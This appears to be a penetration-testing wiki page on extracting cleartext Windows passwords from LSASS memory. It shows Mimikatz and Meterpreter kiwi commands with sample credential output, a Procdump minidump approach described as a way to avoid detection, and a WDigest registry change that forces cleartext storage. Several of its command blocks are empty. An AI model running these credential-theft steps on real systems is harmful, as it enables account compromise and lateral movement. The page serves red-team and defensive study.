Ctrlk
For the complete documentation index, see llms.txt. This page is also available as Markdown.

Retrieve Windows passwords

This page deals with retrieving windows clear text credentials from memory and WDigest.

Introduction

Retrieving Windows clear text password allows an attacker testing for password reuse, moving laterally, getting foothold on a domain, etc.

Retrieve clear text passwords from memory

Windows historically stored cleartext passwords in RAM, with lsass process. It allows users with admin privileges to dump clear text passwords from memory with tools like Mimikatz, wce, etc.

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
[...]
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
[...]

If you use Meterpreter on Win10 / Win2016, the only thing that works is Kiwi WDigest module.

meterpreter > load kiwi 
Loading extension kiwi...

  .#####.   mimikatz 2.1.1 20170608 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

Success.
meterpreter > creds_wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

Username    Domain     Password
--------    ------     --------
(null)      (null)     (null)
WIN01$      WORKGROUP  (null)
localadmin  WIN01      L0c4l4dm1n

Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.

Minidump

To avoid being detected during assessments, we can use Minidump technic.

It consists in dumping lsass process on the target computer with a legit tool (Procdump by Sysinternals), and parse the dump to retrieve passwords with Mimikatz locally on the attacker machine.

On the attacker machine:

To succesfully extract passwords from this dump, retrieve it locally on a machine with the same major version and the same architecture than the victime machine.

Then use Mimikatz:

Since Mimikatz Nostalgia (2019/05/04), you can parse every dumps with every Windows version/architecture.

WDigest

You can force Windows to store cleartext credentials in memory by simply modifying the value of the WDigest reg key. Clear text passwords will be stored anew once users connect again.

To enable it, change the key value to 1:

To disable it, change the key value to 0:

To take effect, conditions are required :

  • Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:

    • Adding requires lock

    • Removing requires signout

  • Win10:

    • Adding requires signout

    • Removing requires signout

  • Win2016:

    • Adding requires lock

    • Removing requires reboot

Lock, signout, and reboot from CMD

To lock a session, type:

To signout, type:

To reboot, type:

References

PreviousExtracting CredentialsNextRetrieve Windows hashes

Last updated